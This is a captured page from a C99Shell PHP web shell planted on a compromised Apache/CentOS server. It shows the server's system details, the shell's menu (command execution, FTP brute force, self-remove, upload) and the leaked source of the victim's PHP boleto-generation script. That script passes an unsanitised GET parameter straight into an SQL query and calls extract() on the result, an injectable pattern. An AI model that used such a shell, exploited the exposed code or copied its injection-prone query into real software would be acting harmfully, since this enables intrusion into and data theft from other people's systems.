!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/boleto_conarci/   drwxr-xr-x
Free 9.41 GB of 93.48 GB (10.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     GeraBoletoSicredi.php (6.43 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header
("Content-Type: text/html;  charset=utf-8",true);
header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1   
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Data já vencida

    
$CaminhoConexao '../includes';
    include 
"$CaminhoConexao/inc_Conexao.php";
    include 
"$CaminhoConexao/inc_Funcoes.php";
    
    
$_SESSION['carrinho'] = array();

/*
    include("../../config/config.php");
    include(INCLUDES . "conexaoBD.php");
    include(INCLUDES . "funcoes_uteis.php");
    include("boletos_class.php");

    $boletos = new Boletos();
*/
/*
echo '<pre>';
print_r($_SESSION);
echo '</pre>';

echo '<pre>';
print_r($_GET);
echo '</pre>';

die();
*/
//busca os dados do boleto
    
$numBoleto $_GET['num_boleto'];
    
    
$qryBusca "
        SELECT *
        FROM irp_servicos_boletos
             INNER JOIN irp_servicos_mensalidades ON SRM_RowID = SVB_Mensalidade_DR             
             INNER JOIN oficios ON OFI_RowID = SRM_Oficio_DR             
             INNER JOIN contatos ON CON_Oficios_DR = OFI_RowID             
             INNER JOIN cidades ON CID_RowID = OFI_Cidades_DR             
             INNER JOIN irp_servicos_mensagens_boletos ON SVM_RowID = SVB_MensagemBoleto_DR
        WHERE SVB_RowID = 
$numBoleto
    "
;
    
//echo '<pre>'.$qryBusca.'</pre>';
    //die();
    
$exeBusca mysql_query($qryBusca);
    
$rsBusca mysql_fetch_assoc($exeBusca);
    
    if (!empty(
$rsBusca)) {
        
//echo '<pre>';
        //print_r($rsBusca);
        //echo '</pre>';
        //die();
        
extract($rsBusca);
    
    
/*
    //Gravado no banco de dados..
    $texto_demonstrativo = "Registrador Civil, agora o site do IRPEN conta com uma consulta personalizada de cartórios "
                ."através da apresentação do mapa do Paraná dividido em Microrregiões Geográficas. Nisso, "
                ."pedimos o seu auxílio para conferência dos dados de sua serventia apresentados em tela, através "
                ."do acesso ao site http://arpenpr.org.br, clicando sob o menu “Serviços -> Procure a Serventia "
                ."Registral do Paraná”<br /><br />"
                ."Além disso, você que é associado, tem permissão de acesso a conteúdos exclusivos que referem-se "
                ."exclusivamente aos seus serviços através da digitação de login e senha nos campos dispostos no "
                ."canto superior da tela. <br /><br />"
                ."Acesse e confira os recursos que o IRPEN esta disponibilizando a você.<br />"
                ."Seja um associado. Junte-se a nós nessa caminhada.";
            
    $texto2 = "O XVII CONGRESSO NACIONAL DOS REGISTRADORES DE PESSOAS NATURAIS OCORRERÁ "
                ."NOS DIAS 07, 08 E 09 DE OUTUBRO DE 2009 NA CIDADE DE CURITIBA!!!<br /><br />"
                ."EM BREVE TODAS AS INFORMAÇÕES EM NOSSO SITE WWW.IRPEN.ORG.BR";
    
    $texto_demonstrativo = $texto_demonstrativo . "<br /><br />" . $texto2;*/
    
    
$instrucoes "PAGÁVEL PREFERENCIALMENTE NAS COOPERATIVAS DE CRÉDITO DO SICREDI";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<head>
<script>
    var str = "left=0,screenX=0,top=0,screenY=0";
    if (window.screen)
    {
    var ah = screen.availHeight - 30;
    var aw = screen.availWidth - 10;
    str += ",height=" + ah;
    str += ",innerHeight=" + ah;
    str += ",width=" + aw;
    str += ",innerWidth=" + aw;
    }
    else
    {
        str += ",resizable"; // so the user can resize the window manually
    }
    
    function launchFull(url, name)
    {
        return window.open(url, name, str);
    }
    </script>
</head>
<body topmargin="0" leftmargin="0" bgcolor="#FFFFFF" onLoad="javascript:document.form.submit()">
<!--
<form action="http://www.arpenpr.org.br/cgi-cb/CobreBemECommerce" name="form" id="form">
-->
<form action="boleto_sicredi.php" name="form" id="form">
    <input type="hidden" name="IdentificacaoPagina" value="PB">
    <!--input type="hidden" name="UsuarioBoleto" value="20090406171617374"-->
    <input type="hidden" name="UsuarioBoleto" value="20110227212402333">
    <input type="hidden" name="CSID" size="20" value="Irpen">
    <input type="hidden" name="data_venc" value="<?= $SVB_DataVencimento?>">
    <input type="hidden" name="prazo" value="">
    <input type="hidden" name="VencimentoDiaUtil" value="S">
    <input type="hidden" name="NumeroDocumento" value="<?= $SVB_RowID?>">
    <input type="hidden" name="DataDocumento" value="<?= $SVB_DataProcessamento?>">
    <input type="hidden" name="valor" value="<?= $SVB_Valor?>">
    <input type="hidden" name="CaracterDecimal" value=",">
    <input type="hidden" name="CaracterMilhar" value=".">
    <input type="hidden" name="nosso_numero" value="<?= $SVB_RowID?>">
    <input type="hidden" name="CalculaDac" value="S">
    <input type="hidden" name="nome" value="Ofício: <?= $OFI_Descricao?><br />Titular: <?= $CON_Descricao?>">
    <input type="hidden" name="endereco" value="<?= $OFI_Endereco?>">
    <input type="hidden" name="cep" value="<?= $OFI_Cep?>">
    <input type="hidden" name="BairroSacado" value="<?= $OFI_Bairro?>" >
    <input type="hidden" name="cidade" value="<?= $CID_Descricao?>">
    <input type="hidden" name="uf" value="PR">
    <input type="hidden" name="CNPJCPFSacado" value="<?= $OFI_CNPJ?>">
    <input type="hidden" name="Demonstrativo" value="<? //=$SVM_Mensagem?>">
    <input type="hidden" name="InstrucoesCaixaCedente" value="<?= $instrucoes;?>" />
    <input type="hidden" name="Moeda" value="">
    <input type="hidden" name="Quantidade" value="">
    <input type="hidden" name="ValorDesconto" value="">
    <input type="hidden" name="ValorOutrosAcrescimos" value="">
    <input type="hidden" name="SacadorAvalista" value="">
    <input type="hidden" name="PrefixoNossoNumero" value="">
    <input type="hidden" name="EspecieDocumento" value="">
    <input type="hidden" name="Aceite" value="">
    <input type="hidden" name="PercentualMulta" value="">
    <input type="hidden" name="PercentualJurosDia" value="">
    <input type="hidden" name="NossoNumeroWS" value="<?= $SVB_NossoNumeroWS;?>">
    <center>
        <br />
        <font face="verdana" size="2"><b>Aguarde, gerando boleto...</b></font> <br>
        <font face="verdana" size="2"><b>Caso o boleto n&atilde;o esteja aparecendo clique <a href="javascript:document.form.submit();">aqui</a>.</b> </font>
    </center>
</form>
</body>
</html>
<?php
    
} else{
        echo 
"<script language='javascript'>\n";
        echo 
"alert('Boleto não foi encontrado!');\n";
        echo 
"window.close();\n";
        echo 
"</script>\n";
    }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.004 ]--